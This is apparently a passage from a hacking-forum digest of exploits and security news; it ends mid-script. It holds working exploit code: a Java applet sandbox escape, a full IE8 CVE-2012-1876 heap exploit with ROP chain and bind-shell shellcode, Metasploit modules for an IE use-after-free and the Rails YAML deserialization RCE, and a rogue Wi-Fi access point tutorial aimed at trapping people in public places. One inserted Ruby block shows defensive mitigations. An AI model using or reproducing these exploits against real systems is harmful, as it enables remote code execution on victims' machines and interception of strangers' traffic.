    // Decodes a hex string into the raw bytes of the payload class.
    public byte[] hex2Byte(String paramString) {
        byte[] arrayOfByte = new byte[paramString.length() / 2];
        for (int i = 0; i < arrayOfByte.length; i++) {
            arrayOfByte[i] = (byte) Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
        }
        return arrayOfByte;
    }

    // Hex-encoded bytes of the payload class (the one that switches the SecurityManager off);
    // elided in the posted source.
    public static String ByteArrayWithSecOff = "...";

    public void init() {
        try {
            byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);

            // Bug 1: MBeanInstantiator.findClass() hands out classes from a restricted package
            // (sun.org.mozilla.javascript.internal.*) that an untrusted applet may not load directly.
            JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
            JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer) localJmxMBeanServerBuilder.newMBeanServer("", null, null);
            MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
            ClassLoader a = null;
            Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
            Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);

            // Bug 2: Lookup.findConstructor / findVirtual are not called directly but through a
            // MethodHandle driven by invokeWithArguments, so the package-access check is evaluated
            // against a trusted system caller instead of the applet (the incomplete Issue 32 fix
            // described in item 1).
            MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
            MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
            MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);

            // new Context()
            MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
            MethodHandle localMethodHandle2 = (MethodHandle) localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
            Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);

            // Handle on Lookup.findVirtual, obtained the same indirect way.
            MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
            MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);

            // GeneratedClassLoader gcl = context.createClassLoader(null)
            MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
            MethodHandle localMethodHandle4 = (MethodHandle) localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
            Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });

            // gcl.defineClass(null, bytes): the payload class is defined in a privileged namespace.
            MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
            MethodHandle localMethodHandle5 = (MethodHandle) localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2, "defineClass", localMethodType5 });
            Class localClass3 = (Class) localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });

            // Instantiating the payload disables the SecurityManager; the sandbox is gone.
            localClass3.newInstance();
            Runtime.getRuntime().exec("calc.exe");
        } catch (Throwable ex) {}
    }
}
```
  16. Details:
https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156
https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156
Ronin - Rails PoC exploits for CVE-2013-0156 and CVE-2013-0155
  17. PS: Author: sickness
  18. [h=1]Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass[/h]
      <!--
      ** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass
      ** Author: sickness@offsec.com
      ** Thanks to Ryujin and Dookie for their help.
      ####################################################################
      ** Affected Software: Internet Explorer 8
      ** Vulnerability: Fixed Col Span ID
      ** CVE: CVE-2012-1876
      ** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
      ** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php
      ** Tested on Windows 7 (x86) - IE 8.0.7601.17514
      ####################################################################
      ** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak
      ** To get it working on a different version of Windows you will need to make your own changes to the exploit
      ** Have fun
      -->
      <html>
      <body>
      <div id="evil"></div>
      <table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>
      <script language='javascript'>
      function strtoint(str) {
          return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
      }

      var free = "EEEE";
      while ( free.length < 500 ) free += free;
      var string1 = "AAAA";
      while ( string1.length < 500 ) string1 += string1;
      var string2 = "BBBB";
      while ( string2.length < 500 ) string2 += string2;

      var fr = new Array();
      var al = new Array();
      var bl = new Array();

      var div_container = document.getElementById("evil");
      div_container.style.cssText = "display:none";

      for (var i=0; i < 500; i+=2) {
          fr[i] = free.substring(0, (0x100-6)/2);
          al[i] = string1.substring(0, (0x100-6)/2);
          bl[i] = string2.substring(0, (0x100-6)/2);
          var obj = document.createElement("button");
          div_container.appendChild(obj);
      }

      for (var i=200; i<500; i+=2 ) {
          fr[i] = null;
          CollectGarbage();
      }

      function heapspray(cbuttonlayout) {
          CollectGarbage();

          var rop = cbuttonlayout + 4161;      // RET
          var rop = rop.toString(16);
          var rop1 = rop.substring(4,8);
          var rop2 = rop.substring(0,4);       // } RET

          var rop = cbuttonlayout + 11360;     // POP EBP
          var rop = rop.toString(16);
          var rop3 = rop.substring(4,8);
          var rop4 = rop.substring(0,4);       // } RET

          var rop = cbuttonlayout + 111675;    // XCHG EAX,ESP
          var rop = rop.toString(16);
          var rop5 = rop.substring(4,8);
          var rop6 = rop.substring(0,4);       // } RET

          var rop = cbuttonlayout + 12377;     // POP EBX
          var rop = rop.toString(16);
          var rop7 = rop.substring(4,8);
          var rop8 = rop.substring(0,4);       // } RET

          var rop = cbuttonlayout + 642768;    // POP EDX
          var rop = rop.toString(16);
          var rop9 = rop.substring(4,8);
          var rop10 = rop.substring(0,4);      // } RET

          var rop = cbuttonlayout + 12201;     // POP ECX --> Changed
          var rop = rop.toString(16);
          var rop11 = rop.substring(4,8);
          var rop12 = rop.substring(0,4);      // } RET

          var rop = cbuttonlayout + 5504544;   // Writable location
          var rop = rop.toString(16);
          var writable1 = rop.substring(4,8);
          var writable2 = rop.substring(0,4);  // } RET

          var rop = cbuttonlayout + 12462;     // POP EDI
          var rop = rop.toString(16);
          var rop13 = rop.substring(4,8);
          var rop14 = rop.substring(0,4);      // } RET

          var rop = cbuttonlayout + 12043;     // POP ESI --> changed
          var rop = rop.toString(16);
          var rop15 = rop.substring(4,8);
          var rop16 = rop.substring(0,4);      // } RET

          var rop = cbuttonlayout + 63776;     // JMP EAX
          var rop = rop.toString(16);
          var jmpeax1 = rop.substring(4,8);
          var jmpeax2 = rop.substring(0,4);    // } RET

          var rop = cbuttonlayout + 85751;     // POP EAX
          var rop = rop.toString(16);
          var rop17 = rop.substring(4,8);
          var rop18 = rop.substring(0,4);      // } RET

          var rop = cbuttonlayout + 4936;      // VirtualProtect()
          var rop = rop.toString(16);
          var vp1 = rop.substring(4,8);
          var vp2 = rop.substring(0,4);        // } RET

          var rop = cbuttonlayout + 454843;    // MOV EAX,DWORD PTR DS:[EAX]
          var rop = rop.toString(16);
          var rop19 = rop.substring(4,8);
          var rop20 = rop.substring(0,4);      // } RET

          var rop = cbuttonlayout + 234657;    // PUSHAD
          var rop = rop.toString(16);
          var rop21 = rop.substring(4,8);
          var rop22 = rop.substring(0,4);      // } RET

          var rop = cbuttonlayout + 408958;    // PUSH ESP
          var rop = rop.toString(16);
          var rop23 = rop.substring(4,8);
          var rop24 = rop.substring(0,4);      // } RET

          var shellcode = unescape("%u"+rop1+"%u"+rop2);        // RET
          shellcode+= unescape("%u"+rop3+"%u"+rop4);            // POP EBP
          shellcode+= unescape("%u"+rop5+"%u"+rop6);            // XCHG EAX,ESP
          shellcode+= unescape("%u"+rop3+"%u"+rop4);            // POP EBP
          shellcode+= unescape("%u"+rop3+"%u"+rop4);            // POP EBP
          shellcode+= unescape("%u"+rop7+"%u"+rop8);            // POP EBX
          shellcode+= unescape("%u1024%u0000");                 // Size 0x00001024
          shellcode+= unescape("%u"+rop9+"%u"+rop10);           // POP EDX
          shellcode+= unescape("%u0040%u0000");                 // 0x00000040
          shellcode+= unescape("%u"+rop11+"%u"+rop12);          // POP ECX
          shellcode+= unescape("%u"+writable1+"%u"+writable2);  // Writable Location
          shellcode+= unescape("%u"+rop13+"%u"+rop14);          // POP EDI
          shellcode+= unescape("%u"+rop1+"%u"+rop2);            // RET
          shellcode+= unescape("%u"+rop15+"%u"+rop16);          // POP ESI
          shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);      // JMP EAX
          shellcode+= unescape("%u"+rop17+"%u"+rop18);          // POP EAX
          shellcode+= unescape("%u"+vp1+"%u"+vp2);              // VirtualProtect()
          shellcode+= unescape("%u"+rop19+"%u"+rop20);          // MOV EAX,DWORD PTR DS:[EAX]
          shellcode+= unescape("%u"+rop21+"%u"+rop22);          // PUSHAD
          shellcode+= unescape("%u"+rop23+"%u"+rop24);          // PUSH ESP
          shellcode+= unescape("%u9090%u9090");                 // crap
          shellcode+= unescape("%u9090%u9090");                 // crap

          // Bind shellcode on 4444
          shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
                               "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
                               "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
                               "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
                               "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
                               "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
                               "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
                               "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
                               "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
                               "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
                               "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
                               "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
                               "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
                               "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
                               "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
                               "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
                               "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
                               "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
                               "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
                               "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
                               "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
                               "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
                               "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
                               "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
                               "%u006a%uff53%u41d5");

          while (shellcode.length < 100000) shellcode = shellcode + shellcode;

          var onemeg = shellcode.substr(0, 64*1024/2);
          for (i=0; i<14; i++) {
              onemeg += shellcode.substr(0, 64*1024/2);
          }
          onemeg += shellcode.substr(0, (64*1024/2)-(38/2));

          var spray = new Array();
          for (i=0; i<100; i++) {
              spray[i] = onemeg.substr(0, onemeg.length);
          }
      }

      function leak(){
          var leak_col = document.getElementById("132");
          leak_col.width = "41";
          leak_col.span = "19";
      }

      function get_leak() {
          var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
          str_addr = str_addr - 1410704;
          setTimeout(function(){heapspray(str_addr)}, 200);
      }

      function trigger_overflow(){
          var evil_col = document.getElementById("132");
          evil_col.width = "1178993";
          evil_col.span = "44";
      }

      setTimeout(function(){leak()}, 300);
      setTimeout(function(){get_leak()},700);
      //setTimeout(function(){heapspray()}, 900);
      setTimeout(function(){trigger_overflow()}, 1200);
      </script>
      </body>
      </html>

      Source: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass
  19. [h=1]Microsoft Internet Explorer Option Element Use-After-Free[/h]
      ##
      # This file is part of the Metasploit Framework and may be subject to
      # redistribution and commercial restrictions. Please see the Metasploit
      # Framework web site for more information on licensing and terms of use.
      # http://metasploit.com/framework/
      ##

      require 'msf/core'

      class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::HttpServer::HTML
        include Msf::Exploit::RopDb

        def initialize(info={})
          super(update_info(info,
            'Name'           => "Microsoft Internet Explorer Option Element Use-After-Free",
            'Description'    => %q{
              This module exploits a vulnerability in Microsoft Internet Explorer. A memory
              corruption may occur when the Option cache isn't updated properly, which allows
              other JavaScript methods to access a deleted Option element, and results in code
              execution under the context of the user.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
              [
                'Ivan Fratric',  #Initial discovery
                'juan vazquez',  #Metasploit
                'sinn3r'         #Metasploit
              ],
            'References'     =>
              [
                [ 'CVE', '2011-1996' ],
                [ 'MSB', 'MS11-081' ],
                [ 'URL', 'http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html' ],
                [ 'URL', 'http://pastebin.com/YLH725Aj' ]
              ],
            'Payload'        =>
              {
                'StackAdjustment' => -3500,
              },
            'DefaultOptions' =>
              {
                'InitialAutoRunScript' => 'migrate -f'
              },
            'Platform'       => 'win',
            'Targets'        =>
              [
                [ 'Automatic', {} ],
                [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ],
                [ 'IE 8 on Windows Vista',  { 'Rop' => :jre,    'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ],
                [ 'IE 8 on Windows 7',      { 'Rop' => :jre,    'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ]
              ],
            'Privileged'     => false,
            'DisclosureDate' => "Oct 11 2012",
            'DefaultTarget'  => 0))

          register_options(
            [
              OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
            ], self.class)
        end

        def get_target(agent)
          #If the target is already specified by the user, we'll just use that
          return target if target.name != 'Automatic'

          nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
          ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

          ie_name = "IE #{ie}"

          case nt
          when '5.1'
            os_name = 'Windows XP SP3'
          when '6.0'
            os_name = 'Windows Vista'
          when '6.1'
            os_name = 'Windows 7'
          end

          targets.each do |t|
            if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
              print_status("Target selected as: #{t.name}")
              return t
            end
          end

          return nil
        end

        def ie_heap_spray(my_target, p)
          js_code        = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
          js_nops        = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
          js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))

          js = %Q|
          function heap_spray() {
            var heap_obj = new heapLib.ie(0x20000);
            var code = unescape("#{js_code}");
            var nops = unescape("#{js_nops}");
            while (nops.length < 0x80000) nops += nops;
            var offset = nops.substring(0, #{my_target['Offset']});
            var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
            while (shellcode.length < 0x40000) shellcode += shellcode;
            var block = shellcode.substring(0, (0x80000-6)/2);
            heap_obj.gc();
            for (var i=1; i < 0x300; i++) {
              heap_obj.alloc(block);
            }
            var overflow = nops.substring(0, 10);
          }
          |

          js = heaplib(js, {:noobfu => true})

          if datastore['OBFUSCATE']
            js = ::Rex::Exploitation::JSObfu.new(js)
            js.obfuscate
            @heap_spray_func = js.sym("heap_spray")
          end

          return js
        end

        def get_payload(t, cli)
          code = payload.encoded

          # No rop. Just return the payload.
          return code if t['Rop'].nil?

          # Both ROP chains generated by mona.py - See corelan.be
          case t['Rop']
          when :msvcrt
            print_status("Using msvcrt ROP")
            rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
            rop_payload << make_nops(t['OffsetVirtualFunc']-rop_payload.length)
            rop_payload << "\xeb\x04"              # jmp $+6
            rop_payload << [0x77c15ed5].pack("V")  # 0x0c0c0c0 # stackpivot => xchg eax, esp # ret
            rop_payload << code
          else
            print_status("Using JRE ROP")
            rop_payload = generate_rop_payload('java', '')
            rop_payload << make_nops(t['OffsetVirtualFunc']-rop_payload.length)
            rop_payload << "\xeb\x08"              # jmp $+10
            rop_payload << [0x7c348b05].pack("V")  # stackpivot => xchg eax, esp # ret
            rop_payload << [0x7c348b05].pack("V")  # stackpivot => xchg eax, esp # ret
            rop_payload << code
          end

          return rop_payload
        end

        def load_exploit_html(my_target, cli)
          @heap_spray_func = "heap_spray"
          p  = get_payload(my_target, cli)
          js = ie_heap_spray(my_target, p)

          #var fakeobj = unescape("%u0c0c%u0c0c"); #call to 0c0c0c0c
          #eax ==> 0c0c0a14

          html = %Q|
          <!DOCTYPE html>
          <html>
          <head>
          <script>
          #{js}
          function ivan() {
            var fakeobj = unescape("%u0a14%u0c0c");
            fakeobj += unescape("%u4141%u4141");
            while (fakeobj.length <= 0x38/2) fakeobj += unescape("%u4141%u4141");

            var formobj, selobj, optobj;
            selobj = document.getElementById("select1");
            formobj = selobj.form;

            var imgarray = new Array();
            for(var j = 0; j < 500; j++) {
              imgarray.push(document.createElement("img"));
            }

            for(var i=0;i<5;i++) {
              optobj = document.createElement('option');
              optobj.text = "test";
              selobj.add(optobj);
            }

            selobj.innerText = "foo";

            for(var i = 0; i < imgarray.length; i++) {
              imgarray[i].title = fakeobj.substring(0, 0x38 / 2 - 1);
            }

            #{@heap_spray_func}();
            formobj.reset();
          }
          </script>
          </head>
          <body onload='ivan()'>
          <form method="post">
          <select id="select1">
          </select>
          </form>
          </body>
          </html>
          |

          return html
        end

        def on_request_uri(cli, request)
          agent = request.headers['User-Agent']
          uri   = request.uri
          print_status("Requesting: #{uri}")

          my_target = get_target(agent)
          # Avoid the attack if no suitable target found
          if my_target.nil?
            print_error("Browser not supported, sending 404: #{agent}")
            send_not_found(cli)
            return
          end

          html = load_exploit_html(my_target, cli)
          html = html.gsub(/^\t\t/, '')
          print_status("Sending HTML...")
          send_response(cli, html, {'Content-Type'=>'text/html'})
        end

      end

      Source: Microsoft Internet Explorer Option Element Use-After-Free
  20. [h=1]Ruby on Rails XML Processor YAML Deserialization Code Execution[/h]
      ##
      # This file is part of the Metasploit Framework and may be subject to
      # redistribution and commercial restrictions. Please see the Metasploit
      # web site for more information on licensing and terms of use.
      # http://metasploit.com/
      ##

      require 'msf/core'

      class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::CmdStagerTFTP
        include Msf::Exploit::Remote::HttpClient

        def initialize(info = {})
          super(update_info(info,
            'Name'           => 'Ruby on Rails XML Processor YAML Deserialization Code Execution',
            'Description'    => %q{
              This module exploits a remote code execution vulnerability in the XML request
              processor of the Ruby on Rails application framework. This vulnerability allows
              an attacker to instantiate a remote object, which in turn can be used to execute
              any ruby code remotely in the context of the application. This module has been
              tested across multiple versions of RoR 3.x and RoR 2.x
            },
            'Author'         =>
              [
                'charlisome', # PoC
                'espes',      # PoC and Metasploit module
                'lian',       # Identified the RouteSet::NamedRouteCollection vector
                'hdm'         # Module merge/conversion/payload work
              ],
            'License'        => MSF_LICENSE,
            'References'     =>
              [
                ['CVE', '2013-0156'],
                ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156']
              ],
            'Platform'       => 'ruby',
            'Arch'           => ARCH_RUBY,
            'Privileged'     => false,
            'Targets'        => [ ['Automatic', {} ] ],
            'DisclosureDate' => 'Jan 7 2013',
            'DefaultTarget'  => 0))

          register_options(
            [
              Opt::RPORT(80),
              OptString.new('URIPATH', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
              OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"])
            ], self.class)

          register_evasion_options(
            [
              OptBool.new('XML::PadElement', [ true, 'Pad the exploit request with randomly generated XML elements', true])
            ], self.class)
        end

        #
        # This stub ensures that the payload runs outside of the Rails process
        # Otherwise, the session can be killed on timeout
        #
        def detached_payload_stub(code)
          %Q^
            code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first
            if RUBY_PLATFORM =~ /mswin|mingw|win32/
              inp = IO.popen("ruby", "wb") rescue nil
              if inp
                inp.write(code)
                inp.close
              end
            else
              if ! Process.fork()
                eval(code) rescue nil
              end
            end
          ^.strip.split(/\n/).map{|line| line.strip}.join("\n")
        end

        #
        # Create the YAML document that will be embedded into the XML
        #
        def build_yaml_rails2
          # Embed the payload with the detached stub
          code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
          yaml =
            "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
            "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
            "eval(%[#{code}].unpack(%[m0])[0]);' " +
            ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " +
            ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
            ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
          yaml
        end

        #
        # Create the YAML document that will be embedded into the XML
        #
        def build_yaml_rails3
          # Embed the payload with the detached stub
          code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
          yaml =
            "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
            "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
            "eval(%[#{code}].unpack(%[m0])[0]);' " +
            ": !ruby/object:OpenStruct\n table:\n :defaults: {}\n"
          yaml
        end

        #
        # Create the XML wrapper with any desired evasion
        #
        def build_request(v)
          xml = ''
          elo = Rex::Text.rand_text_alpha(rand(12)+4)

          if datastore['XML::PadElement']
            xml << "<#{elo}>"
            1.upto(rand(1000)+50) do
              el = Rex::Text.rand_text_alpha(rand(12)+4)
              tp = ['string', 'integer'][ rand(2) ]
              xml << "<#{el} type='#{tp}'>"
              xml << ( tp == "integer" ? Rex::Text.rand_text_numeric(rand(8)+1) : Rex::Text.rand_text_alphanumeric(rand(8)+1) )
              xml << "</#{el}>"
            end
          end

          el = Rex::Text.rand_text_alpha(rand(12)+4)
          xml << "<#{el} type='yaml'>"
          xml << (v == 2 ? build_yaml_rails2 : build_yaml_rails3)
          xml << "</#{el}>"

          if datastore['XML::PadElement']
            1.upto(rand(1000)+50) do
              el = Rex::Text.rand_text_alpha(rand(12)+4)
              tp = ['string', 'integer'][ rand(2) ]
              xml << "<#{el} type='#{tp}'>"
              xml << ( tp == "integer" ? Rex::Text.rand_text_numeric(rand(8)+1) : Rex::Text.rand_text_alphanumeric(rand(8)+1) )
              xml << "</#{el}>"
            end
            xml << "</#{elo}>"
          end

          xml
        end

        #
        # Send the actual request
        #
        def exploit
          print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
          res = send_request_cgi({
            'uri'    => datastore['URIPATH'] || "/",
            'method' => datastore['HTTP_METHOD'],
            'ctype'  => 'application/xml',
            'data'   => build_request(3)
          }, 25)
          handler

          print_status("Sending Railsv2 request to #{rhost}:#{rport}...")
          res = send_request_cgi({
            'uri'    => datastore['URIPATH'] || "/",
            'method' => datastore['HTTP_METHOD'],
            'ctype'  => 'application/xml',
            'data'   => build_request(2)
          }, 25)
          handler
        end

      end

      Source: Ruby on Rails XML Processor YAML Deserialization Code Execution
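The module above relies on the Rails XML parameter parser honouring a `type='yaml'` attribute and handing the element body to the YAML loader. The snippet below is an added defensive example, not part of the module or of Rails, showing the two controls the CVE-2013-0156 fix and its published workaround rested on: removing the `yaml` and `symbol` conversions from the typed-value table (the advisory's `ActiveSupport::XmlMini::PARSING.delete(...)` workaround), and, where an application must accept YAML from a request at all, loading it with Psych's `safe_load` so the `!ruby/hash:` and `!ruby/object:` tags the module emits are rejected before any class is instantiated. `SAFE_PARSING`, `convert_typed_value` and `parse_untrusted_yaml` are names made up for this example, and both sample documents are constructed.

```ruby
require 'yaml'

# Constructed sample documents. HOSTILE_DOC has the shape build_yaml_rails3
# above produces, with the base64 eval payload replaced by a harmless key so
# nothing would execute even if it were loaded unsafely.
HOSTILE_DOC = <<~YAML
  --- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection
  harmless_marker_key: !ruby/object:OpenStruct
    table:
      :defaults: {}
YAML

BENIGN_DOC = <<~YAML
  ---
  name: alice
  count: 3
YAML

# Hypothetical typed-value table in the spirit of ActiveSupport::XmlMini's
# PARSING hash (this is not Rails code). The vulnerable releases also mapped
# "yaml" to YAML.load and "symbol" to String#to_sym; the fix removed both, so
# an element such as <foo type='yaml'> now falls through to plain-string
# handling instead of reaching the YAML loader.
SAFE_PARSING = {
  "integer" => ->(s) { Integer(s.strip, 10) },
  "boolean" => ->(s) { %w[true 1].include?(s.strip) },
  "string"  => ->(s) { s },
}.freeze

# Convert one typed XML parameter value. Unknown or removed types are left as
# the inert string they arrived as.
def convert_typed_value(type, text)
  conv = SAFE_PARSING[type]
  conv ? conv.call(text) : text
end

# Where an application genuinely has to accept YAML from a request body,
# safe_load builds only core scalars, arrays and hashes; any !ruby/* tag (and,
# with an empty permitted list, any Symbol) raises Psych::DisallowedClass
# instead of allocating the named class.
def parse_untrusted_yaml(doc)
  YAML.safe_load(doc, permitted_classes: [], permitted_symbols: [], aliases: false)
rescue Psych::DisallowedClass => e
  { error: e.class.name, detail: e.message }
end
```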
  21. [h=1]Expert Finds Java 1.7 Zero-Day on High-Profile Website[/h]
      January 10th, 2013, 14:29 GMT · By Eduard Kovacs

      The security expert known as Kafeine, the curator of the Malware Don't Need Coffee website, has come across a new Java zero-day. The vulnerability affects the latest Java 1.7 and it has been found on a website that allegedly records hundreds of thousands of hits each day.

      Experts from AlienVault have analyzed the exploit and they've shown that a malicious Java applet can be used to execute code (in their example, the Calculator application from Windows).

      "The Java file is highly obfuscated but based on the quick analysis we did the exploit is probably bypassing certain security checks tricking the permissions of certain Java classes as we saw in CVE-2012-4681," AlienVault's Jaime Blasco explained.

      Researchers from Bitdefender are also analyzing the zero-day which, they say, has been integrated into the recently developed Cool exploit kit.

      While more details of the vulnerability come to light, experts advise users to disable Java and avoid clicking on suspicious links.

      Source: Expert Finds Java 1.7 Zero-Day on High-Profile Website - Softpedia
  22. [h=1]REPT Reverse Engineering[/h]
      The whole tutorial is about playing with a target and implementing new things into it. The article is not for newbies; you must know how the tools given in this tutorial work.

      Tutorials: http://199.201.127.158/index.php?dir=RCE%20Tutorials/REPT%20Reverse%20Engineering%20Techniques/

      Via: REPT Reverse Engineering Techniques No. 1 - rohitab.com - Forums
  23. INTRODUCTION TO ARM LINUX EXPLOITING
      Metin KAYA
      kayameti@gmail.com
      2013.01.09, 15:30, Istanbul
      Metin KAYA - Official Web Site [EnderUNIX]
      http://www.twitter.com/_metinkaya

      This paper is the Linux version of the document http://www.signalsec.com/publications/arm_exploiting.pdf, which covers exploiting ARM on Windows systems. Thanks to Celil ÜNÜVER for inspiring me. The ARM architecture is used in crucial positions, e.g. mobile phones, femtocells, smallcells, SCADA systems and POS machines. Basic knowledge of ARM, GDB, GCC, C, assembly, Python and some bash commands is necessary to understand what is going on in the document. The host machine is x86 Linux (32-bit, 3.5.0 kernel), so an ARM cross compiler [1] is required for the target machine, which is ARMv7 little-endian Linux (32-bit, 2.6.34 kernel).

      Download: http://packetstorm.foofus.com/papers/general/exploit_arm_linux_en.pdf
  24. Create Wireless Rogue Access Point
      Description: In this video I will show you how to create a fake access point. What is the purpose of creating this fake access point? Let's see: if you are in a public place, you have all your wifi attack gadgets, and you set up a fake access point in the public place with the AP name "FreeNetOnlyForToday", maybe people will try to connect to this AP. Now what can you do? You can fire Metasploit at it, because all connections belong to you, and there are tons of other things you can perform. In the next video I will cover how to create a fake AP and get passwords.

      Steps:
      apt-get install dhcp3-server
      airmon-ng start wlan0
      airbase-ng -e FreeNet -c 11 -v wlan0
      ifconfig at0 up
      ifconfig at0 10.0.0.254 netmask 255.255.255.0   # must sit in the subnet declared in dhcpd.conf below
      route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

      ---- Add Config in dhcp3 ----
      Path = /etc/dhcp3/dhcpd.conf
      ---- Paste this ----
      ddns-update-style ad-hoc;
      default-lease-time 600;
      max-lease-time 7200;
      authoritative;
      subnet 10.0.0.0 netmask 255.255.255.0 {
        option subnet-mask 255.255.255.0;
        option broadcast-address 10.0.0.255;
        option routers 10.0.0.254;
        option domain-name-servers 8.8.8.8;
        range 10.0.0.1 10.0.0.140;
      }

      iptables --flush
      iptables --table nat --flush
      iptables --delete-chain
      iptables --table nat --delete-chain
      iptables -P FORWARD ACCEPT
      iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE
      echo > '/var/lib/dhcp3/dhcpd.leases'
      ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
      dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0
      echo "1" > /proc/sys/net/ipv4/ip_forward

      If you find it boring to type all these commands, no problem: use this bash script. It will automate the whole process, but check all the interface names in the script or you will get an error.

      Source: exploit.co.il

      #!/bin/bash
      echo "Killing Airbase-ng..."
      pkill airbase-ng
      sleep 2;
      echo "Killing DHCP..."
